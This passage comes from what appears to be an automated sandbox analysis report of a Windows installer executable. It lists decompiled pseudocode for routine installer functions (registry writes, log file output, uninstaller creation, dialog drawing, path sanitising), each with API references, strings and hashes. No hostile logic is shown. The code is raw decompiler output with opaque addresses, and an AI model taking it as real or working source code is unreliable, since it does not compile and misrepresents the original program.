						_push( *(_t84 + 8));
						 *(_t84 - 8) = _t68 + _t68 + 2;
						_push( *((intOrPtr*)(_t84 - 0x34)));
						if( *(_t84 - 0x14) != 1) {
							_push(L"WriteRegExpandStr: \"%s\\%s\" \"%s\"=\"%s\"");
							E004062CF();
							_t86 = _t86 + 0x14;
							goto L10;
						} else {
							_push(L"WriteRegStr: \"%s\\%s\" \"%s\"=\"%s\"");
							E004062CF();
							_t86 = _t86 + 0x14;
						}
					}
					if(RegSetValueExW( *(_t84 - 0x44),  *(_t84 - 0xc), _t72,  *(_t84 - 0x14), 0x4140f8,  *(_t84 - 8)) != 0) {
						_push( *(_t84 - 0xc));
						_push( *(_t84 + 8));
						E004062CF(L"WriteReg: error writing into \"%s\\%s\" \"%s\"",  *((intOrPtr*)(_t84 - 0x34)));
					} else {
						 *(_t84 - 4) = _t72;
					}
					_push( *(_t84 - 0x44));
					RegCloseKey();
				}
				 *0x47eb68 =  *0x47eb68 +  *(_t84 - 4);
				return 0;
			}

0x00402880
0x00402880
0x00402882
0x0040288e
0x0040288e
0x00402897
0x0040289f
0x004028a9
0x004028b2
0x004028b5
0x004028ba
0x004028bc
0x004028d7
0x004028e2
0x004029ef
0x004029f2
0x004029f5
0x00401b86
0x004028e8
0x004028e8
0x004028f3
0x00402937
0x00402939
0x0040293d
0x00402941
0x00402942
0x00402947
0x00402948
0x0040294b
0x00402950
0x00402953
0x0040295e
0x00402963
0x00402963
0x0040296a
0x0040297d
0x0040298c
0x00402997
0x00402998
0x0040299b
0x004029a6
0x004029ab
0x004029ab
0x004028f5
0x004028f7
0x004028fd
0x00402902
0x00402903
0x0040290a
0x0040290d
0x00402910
0x00402916
0x0040292a
0x0040292f
0x00402934
0x00000000
0x00402918
0x00402918
0x0040291d
0x00402922
0x00402922
0x00402916
0x004029c4
0x004029cb
0x004029ce
0x004029d9
0x004029c6
0x004029c6
0x004029c6
0x004029e1
0x004029e4
0x004029e4
0x004030e6
0x004030f2

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 6922c27e097f92787e26fc118aa39af5b4c6bd4218f107da8a2be32e84873acf
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 6922c27e097f92787e26fc118aa39af5b4c6bd4218f107da8a2be32e84873acf
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Uniqueness

Uniqueness Score: -1.00%

Function 00406113, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406113(void* __ecx, void _a4) {
				long _v8;
				void* _t8;
				long _t11;

				if(_a4 == 0) {
					__eflags =  *0x46d204; // 0x0
					if(__eflags != 0) {
						__eflags =  *0x476240;
						if( *0x476240 == 0) {
							L11:
							__eflags =  *0x40c058 - 0xffffffff;
							if( *0x40c058 != 0xffffffff) {
								goto L12;
							}
						} else {
							__eflags =  *0x40c058 - 0xffffffff;
							if( *0x40c058 != 0xffffffff) {
								L12:
								lstrcatW(0x46d220, L"\r\n");
								_t11 = lstrlenW(0x46d220) + _t10;
								__eflags = _t11;
								_t8 = WriteFile( *0x40c058, 0x46d220, _t11,  &_a4, 0);
							} else {
								_a4 = GetFileAttributesW(0x476240);
								_t8 = E00405E7C(0x476240, 0x40000000, 4);
								 *0x40c058 = _t8;
								__eflags = _t8 - 0xffffffff;
								if(_t8 != 0xffffffff) {
									__eflags = _a4 - 0xffffffff;
									if(_a4 == 0xffffffff) {
										_a4 = 0xfeff;
										WriteFile(_t8,  &_a4, 2,  &_v8, 0);
										_t8 =  *0x40c058; // 0xffffffff
									}
									_t8 = SetFilePointer(_t8, 0, 0, 2);
									goto L11;
								}
							}
						}
					}
				} else {
					_t8 =  *0x40c058; // 0xffffffff
					if(_t8 != 0xffffffff) {
						_t8 = CloseHandle(_t8);
					}
					 *0x40c058 =  *0x40c058 | 0xffffffff;
				}
				return _t8;
			}

0x0040611d
0x0040613c
0x00406142
0x00406150
0x00406157
0x004061b3
0x004061b3
0x004061ba
0x00000000
0x00000000
0x00406159
0x00406159
0x00406160
0x004061bc
0x004061c7
0x004061d9
0x004061d9
0x004061e3
0x00406162
0x00406176
0x00406179
0x0040617e
0x00406183
0x00406186
0x00406188
0x0040618c
0x0040619a
0x004061a1
0x004061a3
0x004061a3
0x004061ad
0x00000000
0x004061ad
0x00406186
0x00406160
0x004061e6
0x0040611f
0x0040611f
0x00406127
0x0040612a
0x0040612a
0x00406130
0x00406130
0x004061e9

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),0040A678), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\")
API String ID: 3734993849-2343727475
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Uniqueness

Uniqueness Score: -1.00%

Function 00402E55, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402E55(struct _OVERLAPPED* __ebx) {
				void* _t29;
				long _t35;
				struct _OVERLAPPED* _t51;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t63;

				_t51 = __ebx;
				 *(_t63 - 0x10) = 0xfffffd66;
				_t57 = E0040145C(_t54, 0xfffffff0);
				 *(_t63 - 0x14) = _t26;
				if(E00405D51(_t57) == 0) {
					E0040145C(_t54, 0xffffffed);
				}
				E00405E5C(_t57);
				_t29 = E00405E7C(_t57, 0x40000000, 2);
				 *(_t63 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					_t35 =  *0x47eb0c;
					 *(_t63 - 0x44) = _t35;
					_t56 = GlobalAlloc(0x40, _t35);
					if(_t56 != _t51) {
						E00403368(_t51);
						E00403336(_t56,  *(_t63 - 0x44));
						_t61 = GlobalAlloc(0x40,  *(_t63 - 0x24));
						 *(_t63 - 0x10) = _t61;
						if(_t61 != _t51) {
							E0040337F( *((intOrPtr*)(_t63 - 0x28)), _t51, _t61,  *(_t63 - 0x24));
							while( *_t61 != _t51) {
								_t53 =  *_t61;
								_t62 = _t61 + 8;
								 *(_t63 - 0x38) =  *_t61;
								E00405E38( *((intOrPtr*)(_t61 + 4)) + _t56, _t62, _t53);
								_t61 = _t62 +  *(_t63 - 0x38);
							}
							GlobalFree( *(_t63 - 0x10));
						}
						WriteFile( *(_t63 + 8), _t56,  *(_t63 - 0x44), _t63 - 8, _t51);
						GlobalFree(_t56);
						 *(_t63 - 0x10) = E0040337F(0xffffffff,  *(_t63 + 8), _t51, _t51);
					}
					CloseHandle( *(_t63 + 8));
				}
				_push( *(_t63 - 0x14));
				E004062CF(L"created uninstaller: %d, \"%s\"",  *(_t63 - 0x10));
				_t58 = 0xfffffff3;
				if( *(_t63 - 0x10) < _t51) {
					_t58 = 0xffffffef;
					DeleteFileW( *(_t63 - 0x14));
					 *((intOrPtr*)(_t63 - 4)) = 1;
				}
				E00401435(_t58);
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t63 - 4));
				return 0;
			}

0x00402e55
0x00402e57
0x00402e63
0x00402e66
0x00402e70
0x00402e74
0x00402e74
0x00402e7a
0x00402e87
0x00402e8c
0x00402e92
0x00402e98
0x00402ea6
0x00402eab
0x00402eaf
0x00402eb2
0x00402ebb
0x00402ec7
0x00402ec9
0x00402ece
0x00402ed8
0x00402ef7
0x00402edf
0x00402ee5
0x00402eec
0x00402eef
0x00402ef4
0x00402ef4
0x00402efe
0x00402efe
0x00402f10
0x00402f17
0x00402f29
0x00402f29
0x00402f2f
0x00402f2f
0x00402f35
0x00402f40
0x00402f4a
0x00402f4e
0x00402f52
0x00402f56
0x00402f5c
0x00402f5c
0x00402f64
0x004030e6
0x004030f2

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32 ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32 ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: a5cd91473bc46110183df34b4292432c1248d0c105d6ccb82629e3f7b64b7002
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: a5cd91473bc46110183df34b4292432c1248d0c105d6ccb82629e3f7b64b7002
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Uniqueness

Uniqueness Score: -1.00%

Function 00403DF6, Relevance: 12.1, APIs: 8, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403DF6(void* __eax, struct HDC__* _a4, struct HWND__* _a8) {
				struct tagLOGBRUSH _v16;
				void* _t32;
				long _t34;
				long _t36;
				void* _t38;
				long* _t49;

				if(__eax + 0xfffffecd > 5) {
					L15:
					_t32 = 0;
				} else {
					_t49 = GetWindowLongW(_a8, 0xffffffeb);
					if(_t49 == 0) {
						goto L15;
					} else {
						_t34 =  *_t49;
						if((_t49[5] & 0x00000002) != 0) {
							_t34 = GetSysColor(_t34);
						}
						if((_t49[5] & 0x00000001) != 0) {
							SetTextColor(_a4, _t34);
						}
						SetBkMode(_a4, _t49[4]);
						_t36 = _t49[1];
						_v16.lbColor = _t36;
						if((_t49[5] & 0x00000008) != 0) {
							_t36 = GetSysColor(_t36);
							_v16.lbColor = _t36;
						}
						if((_t49[5] & 0x00000004) != 0) {
							SetBkColor(_a4, _t36);
						}
						if((_t49[5] & 0x00000010) != 0) {
							_v16.lbStyle = _t49[2];
							_t38 = _t49[3];
							if(_t38 != 0) {
								DeleteObject(_t38);
							}
							_t49[3] = CreateBrushIndirect( &_v16);
						}
						_t32 = _t49[3];
					}
				}
				return _t32;
			}

0x00403e05
0x00403e99
0x00403e99
0x00403e0b
0x00403e16
0x00403e1a
0x00000000
0x00403e1c
0x00403e20
0x00403e29
0x00403e2c
0x00403e2c
0x00403e32
0x00403e38
0x00403e38
0x00403e44
0x00403e4e
0x00403e51
0x00403e54
0x00403e57
0x00403e59
0x00403e59
0x00403e61
0x00403e67
0x00403e67
0x00403e71
0x00403e76
0x00403e79
0x00403e7e
0x00403e81
0x00403e81
0x00403e91
0x00403e91
0x00403e94
0x00403e94
0x00403e1a
0x00403e9d

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00404F9E, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F9E(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v52;
				long _v64;
				int _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t27;
				WCHAR* _t28;
				signed int _t38;
				signed int _t39;

				_t27 =  *0x476a6c;
				_v8 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t38 =  *0x47eb94;
				_v12 = _t38;
				_t39 = _t38 & 0x00000001;
				if(_t39 == 0) {
					E00406831(_t39, 0, 0x445d80, 0x445d80, _a4);
				}
				_t28 = lstrlenW(0x445d80);
				_a4 = _t28;
				if(_a8 == 0) {
					L6:
					if((_v12 & 0x00000004) == 0) {
						_t28 = SetWindowTextW( *0x476a78, 0x445d80);
					}
					if((_v12 & 0x00000002) == 0) {
						_v52 = 0x445d80;
						_v72 = 1;
						_v68 = SendMessageW(_v8, 0x1004, 0, 0) - _t39;
						_v64 = 0;
						SendMessageW(_v8, 0x104d - _t39, 0,  &_v72);
						_t28 = SendMessageW(_v8, 0x1013, _v68, 0);
					}
					if(_t39 != 0) {
						_t28 = 0;
						0x445d80[_a4] = 0;
					}
					goto L12;
				} else {
					_t28 = lstrlenW(_a8) + _a4;
					if(_t28 >= 0x8010) {
						L12:
						return _t28;
					}
					_t28 = lstrcatW(0x445d80, _a8);
					goto L6;
				}
			}

0x00404fa4
0x00404fac
0x00404fb1
0x00405070
0x00405070
0x00404fb8
0x00404fbe
0x00404fc1
0x00404fca
0x00404fd0
0x00404fd0
0x00404fd6
0x00404fdb
0x00404fe1
0x00404ffe
0x00405002
0x0040500b
0x0040500b
0x00405015
0x00405021
0x0040502a
0x00405035
0x00405048
0x0040504b
0x00405059
0x00405059
0x0040505d
0x00405062
0x00405064
0x00405064
0x00000000
0x00404fe3
0x00404feb
0x00404ff3
0x0040506c
0x00000000
0x0040506d
0x00404ff9
0x00000000
0x00404ff9

APIs

lstrlenW.KERNEL32(00445D80,00424E27,7519EA30,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00424E27,7519EA30,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424E27,7519EA30,00000000), ref: 00406902

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040487A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040487A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404888
0x00404895
0x0040489b
0x004048d7
0x004048d7
0x004048e6
0x004048ed
0x00000000
0x004048ef
0x0040489d
0x004048aa
0x004048b2
0x004048b5
0x004048c7
0x004048cd
0x004048d4
0x00000000
0x004048d4
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32 ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040324C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040324C(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x42c174; // 0x132eb7
					_t11 =  *0x43dd38; // 0x132ebb
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x0040325c
0x0040326a
0x00403270
0x00403270
0x0040327e
0x00403280
0x00403286
0x0040328d
0x0040328f
0x0040328f
0x004032a5
0x004032b5
0x004032c7
0x004032c7
0x004032cf

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00132EB7,00000064,00132EBB), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32 ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00406064, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406064(WCHAR* _a4) {
				signed int _t5;
				signed int _t8;
				WCHAR* _t20;
				WCHAR* _t21;
				WCHAR* _t22;

				_t21 = _a4;
				if( *_t21 == 0x5c && _t21[1] == 0x5c && _t21[2] == 0x3f && _t21[3] == 0x5c) {
					_t21 =  &(_t21[4]);
				}
				if( *_t21 != 0 && E00405D51(_t21) != 0) {
					_t21 =  &(_t21[2]);
				}
				_t5 =  *_t21 & 0x0000ffff;
				_t22 = _t21;
				_t20 = _t21;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405D32(L"*?|<>/\":", _t5))) == 0) {
							E00405E38(_t20, _t21, CharNextW(_t21) - _t21 >> 1);
							_t20 = CharNextW(_t20);
						}
						_t21 = CharNextW(_t21);
						_t5 =  *_t21 & 0x0000ffff;
					} while (_t5 != 0);
				}
				 *_t20 = 0;
				while(1) {
					_push(_t20);
					_push(_t22);
					_t20 = CharPrevW();
					_t8 =  *_t20 & 0x0000ffff;
					if(_t8 != 0x20 && _t8 != 0x5c) {
						break;
					}
					_t8 = 0;
					 *_t20 = 0;
					if(_t22 < _t20) {
						continue;
					}
					break;
				}
				return _t8;
			}

0x00406066
0x0040606f
0x00406086
0x00406086
0x0040608d
0x00406099
0x00406099
0x0040609c
0x0040609f
0x004060a1
0x004060a6
0x004060af
0x004060b3
0x004060d0
0x004060d8
0x004060d8
0x004060dd
0x004060df
0x004060e2
0x004060e7
0x004060ea
0x004060ed
0x004060ed
0x004060ee
0x004060f5
0x004060f7
0x004060fd
0x00000000
0x00000000
0x00406104
0x00406106
0x0040610b
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406110

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
